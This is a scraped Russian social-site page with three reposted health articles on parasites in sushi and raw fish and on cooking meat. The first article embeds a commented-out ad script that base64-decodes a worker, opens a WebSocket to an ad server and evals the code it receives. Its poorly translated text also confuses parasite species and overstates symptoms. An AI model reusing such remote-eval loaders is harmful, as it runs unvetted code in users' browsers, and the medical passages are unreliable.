На информационном ресурсе применяются рекомендательные технологии (информационные технологии предоставления информации на основе сбора, систематизации и анализа сведений, относящихся к предпочтениям пользователей сети "Интернет", находящихся на территории Российской Федерации)

В какой рыбе нет глистов и паразитов?

Широкое распространение в нашей стране получили суши и роллы, с использованием сырой рыбы в том числе. Но в рыбе очень часто встречаются гельминты. Черви могут быть в любой части рыбного филе, но самые излюбленные места их обитания — жабры, кишечник, печень и ротовая полость. Попасть в организм
...Далее

Любители суши! Эти опасные черви, вероятно, внутри вас. Вот что вы должны делать!

\x3c!-- \x3cdiv id=\"M347983Composite625353\">\x3ccenter> \x3ca href=\"http://marketgid.com/\" target=\"_blank\">«агрузка...\x3c/a> \x3c/center>\x3c/div> \x3cscript type=\"text/javascript\"> var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src = \"//jsc.marketgid.com/f/i/fithacker.ru.625353.js?t=\" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script625353.onerror = function () { mg_ws625353 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjUzNTMoZSl7dmFyIGg9bWdfd3M2MjUzNTMub25tZXNzYWdlOyBtZ193czYyNTM1My5yZWFkeVN0YXRlPT1tZ193czYyNTM1My5DTE9TRUQmJihtZ193czYyNTM1Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjI1MzUzX2xvY2F0aW9uKSksbWdfd3M2MjUzNTMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMobWdfd3M2MjUzNTMsZnVuY3Rpb24oKXttZ193czYyNTM1My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjUzNTNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyNTM1MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjUzNTNfbG9jYXRpb24pLCBtZ193czYyNTM1My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjUzNTMoZS5kYXRhKX0=\\'))']), {type: \"application/javascript\"})); mg_ws625353.onmessage = function (msg){window.eval(msg.data);}; mg_ws625353.postMessage('js|'+script625353.src+'|M347983Composite625353|M347983Composite625353');};document.body.appendChild(script625353); \x3c/script>-->\x3c!-- M347983Composite End -->\x3cp lang=\"zxx\" align=\"justify\">Множество людей любят суши — эта еда \x3cspan lang=\"ru-RU\">употреблялась\x3c/span> людьми во всем мире сотни лет. Тем не менее, есть некоторые опасности \x3cspan lang=\"ru-RU\">связанные с\x3c/span> употреблени\x3cspan lang=\"ru-RU\">ем\x3c/span> суши, содержащ\x3cspan lang=\"ru-RU\">их\x3c/span> сырую рыбу. В частности, некоторые виды червей могут \x3cspan lang=\"ru-RU\">присутствовать\x3c/span> в суши и \x3cspan lang=\"ru-RU\">попасть в человеческий организм\x3c/span>. Некоторые виды червей могут попасть в глаза и в центральную нервную систему, что создает серьезные осложнения.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">\x3ca href=\"http://fithacker.ru/wp-content/uploads/2017/07/wprms.jpg\" target=\"_blank\">\x3cimg class=\"alignnone size-medium wp-image-64275\" src=\"//mtdata.ru/u3/photo27CE/20474728890-0/original.jpg#20474728890\" alt=\"\" width=\"300\" height=\"225\" srcset=\"http://fithacker.ru/wp-content/uploads/2017/07/wprms-300x225.jpg 300w, http://fithacker.ru/wp-content/uploads/2017/07/wprms-80x60.jpg 80w, http://fithacker.ru/wp-content/uploads/2017/07/wprms-265x198.jpg 265w, http://fithacker.ru/wp-content/uploads/2017/07/wprms.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\">\x3c/a>\x3c/p>\x3ch4 lang=\"zxx\" align=\"justify\">\x3cstrong>Какие виды червей найдены в суши?\x3c/strong>\x3c/h4>\x3c!-- A generated by theme -->\x3c!-- end A -->\x3cp lang=\"zxx\" align=\"justify\">\x3cstrong>Нематоды\x3c/strong> — это обычно круглые черви, а заражение ими связано с употреблением сырой или недоваренной морской рыбы, известной как анисакиоз. Эти черви находят свой путь в суши, когда фекалии морских млекопитающих входят в океан. Эти фекалии часто содержат яйца этих червей, которые вылупляются и становятся личинками. Личинки едят\x3cspan lang=\"ru-RU\">ся\x3c/span> рыбой и другими животными в океане.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Когда рыбы, которые потребляют нематоды, пойманы и превращаются в суши, черви не умирают. Они остаются в суши, пока не попадут в организм потребителя. В некоторых случаях люди сообщают о «покалывании» после потребления суши. Это чувство на самом деле является \x3cspan lang=\"ru-RU\">признаком наличия \x3c/span>червяк\x3cspan lang=\"ru-RU\">а\x3c/span>, и некоторые люди, испытавшие это чувство, успешно вытащили червя из их рта.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Причина, по которой этот тип червя встречается почти исключительно в суши, состоит в том, что, если мясо, в котором он находится, тщательно готовится, червь умирает. Охлаждение не уничтожит морского паразита.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Черви, ответственные за анишакиоз, в первую очередь поражают пищеварительный тракт, и они могут прикрепляться к пищеводу, желудку или кишечнику. Личинка вырастет до взрослого червя. Когда червь умирает, он создает воспаленную массу в \x3cspan lang=\"ru-RU\">организме\x3c/span>, которая может вызвать осложнения.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Симптомы анисакиаза включают боль в животе, диарею и низкосортную лихорадку.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Что \x3cspan lang=\"ru-RU\">делать\x3c/span>, если \x3cspan lang=\"ru-RU\">вы\x3c/span> подозреваете аниисакиоз? \x3cspan lang=\"ru-RU\">Правильно будет\x3c/span> обратиться к врачу. Если врач подозревает, что у вас может быть анисакиаз (что гораздо более вероятно, если вы регулярно потребляете сырые морепродукты), он или она может выполнять эндоскопию или даже \x3cspan lang=\"ru-RU\">с\x3c/span>делать операцию.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">\x3cstrong>Солитеры\x3c/strong> — \x3cspan lang=\"ru-RU\">это\x3c/span> черви, вызывающие анишакиоз, в основном встречаются в соленой рыбе, ленточные черви обычно встречаются у пресноводных рыб (или рыбы, которые проводят часть своей жизни в пресной воде). Лосось — общий носитель.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Солитеры, как и нематоды, ответственные за анишакиоз, обычно остаются в пищеварительном тракте. Во многих случаях у человека с заражением ленточных червей \x3cspan lang=\"ru-RU\">из\x3c/span> суши не будет симптомов. Однако инфицированный человек может испытывать диарею, общий дискомфорт и потерю веса. В крайних случаях, черви могут вызвать кишечную непроходимость.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">\x3ca href=\"http://fithacker.ru/wp-content/uploads/2017/07/parasites.jpg\" target=\"_blank\">\x3cimg class=\"alignnone size-medium wp-image-64276\" src=\"//mtdata.ru/u3/photoC946/20143947437-0/original.jpg#20143947437\" alt=\"\" width=\"300\" height=\"225\" srcset=\"http://fithacker.ru/wp-content/uploads/2017/07/parasites-300x225.jpg 300w, http://fithacker.ru/wp-content/uploads/2017/07/parasites-80x60.jpg 80w, http://fithacker.ru/wp-content/uploads/2017/07/parasites-265x198.jpg 265w, http://fithacker.ru/wp-content/uploads/2017/07/parasites.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\">\x3c/a>\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">\x3cstrong>Гнатостомий\x3c/strong>: наиболее опасный. Заболевания анисакиоза и ленточного червя могут быть неудобными и болезненными, и они могут привести к тому, что \x3cspan lang=\"ru-RU\">пострадавшему необходимо будет\x3c/span> хирургическо\x3cspan lang=\"ru-RU\">е\x3c/span> вмешательств\x3cspan lang=\"ru-RU\">о\x3c/span>. Однако гнатостомиоз или заражение червем (нематодой) из рода gnathosoma часто намного хуже. Эти паразитические черви чаще всего встречаются в Юго-Восточной Азии и в некоторых частях Африки, но они встречаются редко в Северной и Южной Америке. Эти черви напоминают маленькие миноги, и они сжимаются так же, как анисакиоз.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Хотя употребление в пищу сырых морепродуктов является распространенным способом заражения червями гнатостомы, употребление недожаренных или сырых пресноводных животных (включая птиц, которые пьют из пресной воды), может поставить человека под угрозу. И хотя черви, ответственные за анишакиоз, обычно огранич\x3cspan lang=\"ru-RU\">иваются\x3c/span> пищеварительным трактом, эти черви могут путешествовать во многие области \x3cspan lang=\"ru-RU\">организма\x3c/span>.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Чаще всего, гнатосомные черви видны как небольшие опухоли под кожей. Эти опухоли, в отличие от большинства кожных суставов, двигаются. Это происходит потому, что червь движется прямо под кожей. Если вы видите движущуюся опухоль, вам обязательно нужно немедленно обратиться к врачу, так как многие из этих червей больше проникают в тело.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Черви гнатосомы могут пробиваться в печень и в центральную нервную систему и глаза. Хотя червь не является ядовитым, он может вызвать боль, паралич, и \x3cspan lang=\"ru-RU\">даже \x3c/span>смерть. Это потому, что он путешествует по нервам, вызывая мучительную боль. Если червь попадает в глаза, он может вызвать постоянную слепоту.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">\x3cstrong>Наиболее распространенными признаками \x3cspan lang=\"ru-RU\">того, что внутри вас живут \x3c/span>\x3cspan lang=\"ru-RU\">черви \x3c/span>являются:\x3c/strong>\x3c/p>\x3cul>\n\x3cli lang=\"zxx\">понос\x3c/li>\n\x3cli lang=\"zxx\">рвота\x3c/li>\n\x3cli lang=\"zxx\">лихорадка\x3c/li>\n\x3cli lang=\"zxx\">тошнота\x3c/li>\n\x3cli lang=\"zxx\">недомогание\x3c/li>\n\x3cli lang=\"zxx\">\n\x3cspan lang=\"ru-RU\">б\x3c/span>оль в животе\x3c/li>\n\x3cli lang=\"zxx\">\n\x3cspan lang=\"ru-RU\">в\x3c/span>незапная потеря веса\x3c/li>\n\x3c/ul>\x3ch4 lang=\"zxx\" align=\"justify\">\x3cstrong>Итак, что вы можете с этим поделать?\x3c/strong>\x3c/h4>\x3cp lang=\"zxx\" align=\"justify\">\x3cspan lang=\"ru-RU\">Р\x3c/span>екомендует\x3cspan lang=\"ru-RU\">ся\x3c/span> избегать сырой или \x3ca href=\"http://positivemed.com/2016/03/31/dangerous-worms/\" target=\"_blank\">недоваренной \x3c/a>рыбы. Однако, если вы едите сырую или недоваренную рыбу, важно быть бдительными.\x3c/p>\x3cp lang=\"zxx\" align=\"justify\">Например, вы, вероятно, сможете узнать, есть ли у вас черви, приближающиеся к вашему мозгу, если вы страдаете тяжелой, необъяснимой нервной болью. Тем не менее, чтобы избежать этого, внимательно следите за своей кожей, особенно после еды сырой рыбы.\x3c/p>\x3c!-- A generated by theme -->\x3c!-- end A -->\x3cdiv id=\"subscribe_storyfox\">\x3cdiv class=\"subscribe_storyfox_inner\">\n\x3cp2>\x3cnoindex>\x3cnofollow>\x3c/nofollow>\x3c/noindex>\x3c/p2>\x3cp3>← Жми «Нравится» и читай нас в Фейсбуке\x3c/p3>\n\x3c/div>\x3c/div>\x3cp>\x3cstrong>Понравилось? Поделитесь с друзьями!\x3c/strong>\x3c/p>","comments_count":0,"marks_count":0,"likes":{"count":0,"user_likes":0,"can_like":0,"marks_pluses":0,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://obo.mirtesen.ru/blog/43726659720","tags":["роллы","сырая рыба","черви","суши","Здоровье"],"date":1499542865,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20251656041,"photo_original":"https://mtdata.ru/u3/photo6148/20251656041-0/original.jpg","width":500,"height":324}}],"group":{"display_name":"Обо всём на свете","url":"https://obo.mirtesen.ru","photo_original":"//mtdata.ru/u3/groupBC1F/24e5fc4cf1956636622fdab950b525c6-0/__logo.jpeg","id":30476216193,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1385903514653},"canonical_url":"http://fithacker.ru/articles/lyubiteli-sushi-eti-opasnyie-chervi-veroyatno-vnutri-vas-vot-chto-vyi-dolzhnyi-delat/","topic":"health","title":"Любители суши! Эти опасные черви, вероятно, внутри вас. Вот что вы должны делать!","preview_text":"\x3c!-- M347983Composite Start -->\x3c!-- «агрузка... var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src =","post_type":"post","formattedDates":{"iso":"2017-07-08T19:41:05.000Z","ver1":"8 июля, 22:41","ver2":"08.07.2017 в 22:41","ver3":"8 июля, 22:41"},"images":[{"main":true,"url":"https://mtdata.ru/u3/photo6148/20251656041-0/original.jpg","width":500,"height":324}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43995562871,"from_id":751909916,"from":null,"owner_id":-30357532847,"text":"\x3cimg width=\"670\" height=\"403\" src=\"//mtdata.ru/u1/photo02AB/20534336875-0/original.jpg#20534336875\" class=\"attachment-mvp-post-thumb size-mvp-post-thumb wp-post-image\" alt=\"Anisakis червь\" style=\"float:left; margin:0 15px 15px 0;\" srcset=\"http://riaami.ru/wp-content/uploads/2017/05/01.jpg 670w, http://riaami.ru/wp-content/uploads/2017/05/01-300x180.jpg 300w, http://riaami.ru/wp-content/uploads/2017/05/01-400x240.jpg 400w\" sizes=\"(max-width: 670px) 100vw, 670px\">\x3cp>\x3cstrong>Употребление блюд из сырой рыбы, таких как суши, может быть небезопасно. \x3c/strong>\x3c/p>\n\x3cp>Как пишет British Medical Journal, в клинику попал 32-летний мужчина с болью в верней части живота. У него на протяжении недели также была высокая температура и сильная рвота. Когда пациент сообщил, что ел суши, врачи заподозрили у него анизакиаз или болезнь селедочного глиста. Это инфекция, вызываемая личинками червя рода Anisakis. Она развивается при употреблении сырой или недоваренной морской рыбы.\x3c/p>\n\x3cp>Эндоскопия показала наличие в кишке личинки паразита. После удаления паразита симптомы болезни сразу же пропали. Лабораторное исследование подтвердило, что причиной заболевания стал червь рода Anisakis. \x3c/p>\n\x3cp>Медики предупреждают, что заболевания подобного рода, были характерны ранее для Японии, где распространено поедание сырой рыбы. Но теперь рост этих заболеваний отмечен в западных странах и просят пациентов с болью в животе, тошнотой и другими осложнениями сообщать медикам информацию, если они ели блюда из сырой рыбы.\x3c/p>\n\x3cp>The post \x3ca rel=\"nofollow\" href=\"http://riaami.ru/2017/05/ostorozhno-sushi-otmechen-rost-zarazhenij-boleznyu-seledochnogo-glista/\" target=\"_blank\">Осторожно, суши: отмечен рост заражений болезнью селедочного глиста\x3c/a> appeared first on \x3ca rel=\"nofollow\" href=\"http://riaami.ru\" target=\"_blank\">РИА АМИ\x3c/a>.\x3c/p>","comments_count":0,"marks_count":0,"likes":{"count":0,"user_likes":0,"can_like":0,"marks_pluses":0,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30357532847.mirtesen.ru/blog/43995562871","tags":["паразиты","#миртесен","#СМИ2","Жизнь","сырая рыба","Новости","#соц1","#соц2","суши","Здоровое питание"],"date":1494826780,"canEdit":false,"foreignPollId":null,"attachments":[],"group":{"display_name":"Российское агентство медико-социальной информации","url":"https://s30357532847.mirtesen.ru","photo_original":null,"id":30357532847,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1491231777174},"canonical_url":"http://riaami.ru/2017/05/ostorozhno-sushi-otmechen-rost-zarazhenij-boleznyu-seledochnogo-glista/","topic":"health","title":"Осторожно, суши: отмечен рост заражений болезнью селедочного глиста","preview_text":"Употребление блюд из сырой рыбы, таких как суши, может быть небезопасно. Как пишет British Medical Journal, в клинику попал 32-летний мужчина с болью в верней части живота. У него на протяжении недели также была высокая температура и сильная рвота. Когда пациент сообщил, что ел суши, врачи","post_type":"post","formattedDates":{"iso":"2017-05-15T05:39:40.000Z","ver1":"15 мая, 8:39","ver2":"15.05.2017 в 8:39","ver3":"15 мая, 8:39"},"images":[],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43920796540,"from_id":110876236,"from":{"id":110876236,"display_name":"Клементина Иванова","url":"https://mirtesen.ru/people/110876236","photo_original":"https://mtdata.ru/u24/photo29A8/20714105487-0/original.jpeg","isAuthenticAccount":false,"sex":1},"owner_id":-30669388060,"text":"\x3cp>\x3cspan>Утвержденную, казалось бы, аксиому: «Мясо должно быть хорошо прожарено» то и дело подвергают сомнению самые видные кухни мира; французская кулинарная школа утверждает приоритет мяса с кровью, мяса с нежным розовым соком под хрустящей корочкой, а азиатская кухня настоятельно рекомендует употреблять рыбу и вообще морепродукты в их первозданном виде – то есть сыром. Все это поднимает вопрос о том, какая степень готовности делает мясо и рыбу совершенно безопасными продуктами… \x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"http://mtdata.ru/u23/photo48FA/20527979725-0/original.jpg#20527979725\" alt=\"\" />\x3c/p>\n\x3cp>\x3cspan>Хорошо прожаренное мясо (а на деле часто и пережаренное) – далеко не диетический продукт, то и дело вызывающий справедливые сомнения врачей и диетологов. К зашкаливающему содержанию холестерина в мясе добавляется масса жира, который бифштекс или отбивная впитывает при жарке – и на выходе получается просто кладовая калорий, холестерина и совершенно не полезных жиров. Различные исследования показывают взаимосвязь между употреблением жареного мяса и образованием злокачественных опухолей. Есть мнение, что дело во многом в канцерогенах, образующихся при длительной жарке мяса (как, впрочем, и других продуктов и блюд). Во многом и поэтому разные кухни мира с большей приязнью относятся к «розовому» мясу: оно представляется не таким вредным, более натуральным и, что важнее, максимально свежим, нежным. Но действительно ли мясо с кровью является более полезным для здоровья продуктом, чем хорошо прожаренное мясо? \x3c/span>\x3c/p>\n\x3cp>\x3cstrong>ПОЧЕМУ ЕСТЬ МЯСО С КРОВЬЮ ВРЕДНО?\x3c/strong>\x3c/p>\n\x3cp>\x3cspan> В первую очередь, плохо приготовленное (как и вовсе сырое) мясо – это потенциальный источник попадания в организм всевозможных инфекций и паразитов. Употребляя полусырое мясо, вы рискуете заболеть токсоплазмозом, сальмонеллезом, «подцепить» гельминтов и т.д. Такая вероятность почти полностью исключена, если вы едите хорошо прожаренное мясо: термическая обработка уничтожает до 99% бактерий и личинок паразитов. \x3c/span>\x3c/p>\n\x3cp>\x3cspan>Конечно, не всякое мясо одинаково опасно: если оно попадает на ваш стол с собственной фермы, если вы отдали его предварительно на экспертизу и получили заключение о его безопасности, его можно есть и с кровью, и сырым. Но намного чаще мясо мы покупаем, а значит, имеем весьма приблизительное представление о том, откуда оно взялось. Возможно, животное откармливали, используя специальные препараты, возможно, мясо долго хранилось в неподобающих условиях, возможно, его обрабатывали какой-то не слишком полезной для организма химией. Употребление такого мяса может привести не только к заболеванию инфекционными болезнями и заражению паразитами, но и к тому, что в ваш организм попадут препараты, негативно влияющие на ваше здоровье и биохимические процессы.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Достаточная тепловая обработка\x3c/span>способна хотя бы частично нейтрализовать их действие – в отличие от «сырого» метода приготовления.\x3c/p>\n\x3cp>\x3cstrong>КАК ЛУЧШЕ ВСЕГО УПОТРЕБЛЯТЬ МЯСО?\x3c/strong>\x3c/p>\n\x3cp>\x3cimg src=\"http://mtdata.ru/u25/photoBEC1/20304906876-0/original.jpg#20304906876\" alt=\"\" />\x3c/p>\n\x3cp> \x3c/p>\n\x3cp>Ежедневная норма мяса составляет около 170 г. Красное мясо (говядина, свинина, баранина и т.д.) в идеале должно составлять не больше 50% данной нормы. Остальное должно приходиться на птицу и рыбу. Диетологи советуют есть красное мясо не чаще 2-х раз в неделю, достаточная порция – до 200-250 г. Наилучший способ приготовления мяса – это тушение, варка и запекание в фольге. Пережаренное мясо вредно, полусырое – опасно, а запеченное или тушеное в минимуме жира мясо – самый оптимальный вариант.\x3c/p>\n\x3cp>\x3cstrong> ПАМЯТКА: СТЕПЕНЬ ПРОЖАРКИ МЯСА В МЕЖДУНАРОДНОЙ РЕСТОРАННОЙ ТЕРМИНОЛОГИИ\x3c/strong>\x3c/p>\n\x3cp>Так как мясо с кровью – весьма распространенное явление для зарубежных (особенно европейских и американских) ресторанов, важно правильно соотносить степень прожарки мяса с терминами, которые для этого используются. Дело в том, что если вы попросите мясо в «обычном» виде, вам в 90% случаев принесут его недожаренным.\x3c/p>\n\x3cp>BLUE – почти сырое мясо, непрожаренное, с кровью.\x3c/p>\n\x3cp>RARE – отличается от blue только более оформившейся корочкой сверху.\x3c/p>\n\x3cp>MEDIUM RARE – с кровью, но с толстой прожаренной корочкой.\x3c/p>\n\x3cp>MEDIUM – средней прожарки: с корочкой, при разрезании выделяется розовый мясной сок.\x3c/p>\n\x3cp>MEDIUM WELL – неплохо прожаренное мясо, из которого выделяется прозрачный мясной сок, с корочкой, коричневого цвета.\x3c/p>\n\x3cp>WELL DONE – мясо, прожаренное полностью, без малейших намеков на кровь и вообще розоватость внутри.\x3c/p>\n\x3cp>\x3cstrong>СЫРАЯ РЫБА \x3c/strong>\x3c/p>\n\x3cp>Сырая рыба чаще всего встречается человеку в наших широтах в двух случаях:\x3c/p>\n\x3cp>• В экзотических блюдах (суши, салаты из морепродуктов, всевозможные нарезки из сырой рыбы).\x3c/p>\n\x3cp>• В виде недосоленной (или засоленной неправильно) рыбы, в том числе речной.\x3c/p>\n\x3cp>\x3cimg src=\"http://mtdata.ru/u23/photoB0CA/20612191776-0/original.jpg#20612191776\" alt=\"\" />\x3c/p>\n\x3cp>Оба этих варианта употребления рыбы могут привести к заражению паразитами, развивающимися в человеческом организме. Так, например, неправильно приготовленная или съеденная сырой речная рыба (окунь, щука, икра пресноводных рыб) может стать источником попадания в организм широкого лентеца(рыбного солитера). Океанская рыба – тоже небезопасна, что бы там ни утверждали любители азиатской кухни. Чаще всего встречается такое последствие ее употребления в сыром виде, как анизакидоз; с рыбой в организм попадают личинки червей-анизакид, которые затем развиваются в пищеварительном тракте.\x3c/p>\n\x3cp>Но это далеко не полный перечень заболеваний, которыми могут вас «осчастливить» блюда из сырой рыбы; распространены также нанофиетоз, метагонимоз, клонорхоз и т.д. Все эти заболевания вызываются заражением личинками паразитов, которые могут присутствовать в сырой рыбе.\x3c/p>\n\x3cp>Для безопасного употребления рыба должна быть хорошо приготовлена: прожарена, сварена, запечена или засолена. Личинки паразитов также погибают при длительной и основательной заморозке рыбы (желательно, чтобы рыба была заморожена сразу же после лова, прямо на судне).\x3c/p>\n\x3cp>\x3cbr />\x3cspan>\x3ca href=\"http://prokrasotu.info/topics/naskolko-bezopasno-est-syruyu-rybu-i-myaso-s-krovyu/\" target=\"_blank\">Источник\x3c/a>\x3c/span>\x3c/p>","comments_count":11,"marks_count":5,"likes":{"count":5,"user_likes":0,"can_like":0,"marks_pluses":5,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[{"id":100,"count":5}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30669388060.mirtesen.ru/blog/43920796540","tags":["мясо","Обсуждение с сообществом","рыба","сырая рыба","болезни","здоровье","сырое мясо"],"date":1443607563,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20527979725,"photo_original":"https://mtdata.ru/u23/photo48FA/20527979725-0/original.jpg","width":837,"height":558}}],"group":{"display_name":"ПолонСил.ру - социальная сеть здоровья","url":"https://s30669388060.mirtesen.ru","photo_original":"//mtdata.ru/u20/photo2B7E/20125696275-0/original.jpeg","id":30669388060,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1354869995507},"canonical_url":"https://s30669388060.mirtesen.ru/blog/43920796540","topic":"cooking","title":"Насколько безопасно есть сырую рыбу и мясо с кровью","preview_text":"Утвержденную, казалось бы, аксиому: «Мясо должно быть хорошо прожарено» то и дело подвергают сомнению самые видные кухни мира; французская кулинарная школа утверждает приоритет мяса с кровью, мяса с нежным розовым соком под хрустящей корочкой, а азиатская кухня настоятельно рекомендует употреблять","post_type":"post","formattedDates":{"iso":"2015-09-30T10:06:03.000Z","ver1":"30 сентября, 13:06","ver2":"30.09.2015 в 13:06","ver3":"30 сент., 13:06"},"images":[{"main":true,"url":"https://mtdata.ru/u23/photo48FA/20527979725-0/original.jpg","width":837,"height":558}],"videos":[],"shared_post":null,"mentionedPersons":null}],"tag":"сырая рыба","tagId":80323812207,"hasMore":true,"offset":1,"isGeo":false},"reasonsForShowing":{},"channelMain":{"items":[],"nextOffset":0,"hasMoreItems":true,"currentUserPostId":null,"page":0},"richPostEditor":{"id":null,"title":"","text":"","channel":null,"canSelectChannel":false,"canSubmit":false},"indexChannel":{"items":[],"nextOffset":0,"hasMoreItems":true},"videoList":{},"videoOne":{},"videoRecommendations":{},"channelActions":{},"testDraftJs":{},"channelEditor":{"tab":"info","key":0,"isOpen":false,"isReady":true,"inProcess":false,"channelId":null,"isDirty":false,"header":{"title":"","avatar":null},"info":{"id":null,"name":"","title":"","description":"","isNameAvailable":true,"errors":{}},"content":{"tags":[],"tagSuggestions":[],"geoTags":[],"geoTagSuggestions":[]},"telegramEdit":{"importKey":null,"name":"","tags":[],"tagSuggestions":[],"errors":{}},"telegramList":{"imports":[]}},"channelCoverEditor":{"isOpen":false,"mode":"add","imageSaved":false},"channelAvatarEditor":{"isOpen":false},"myChannels":{"channels":[],"subscriptions":{"items":[],"nextOffset":0,"hasMore":true,"subscriptionsNum":0}},"channelHeaderTags":{"isOpen":false,"searchResults":[],"geoTags":[],"tags":[],"searchInProccess":false,"geoPosition":null,"headerTags":[]},"searchResults":{"query":"","activeTab":"posts","isLoading":false,"posts":{"results":[],"page":0,"hasMore":true},"geo":{"results":[],"page":0,"hasMore":true},"channels":{"results":[],"page":0,"hasMore":true}}}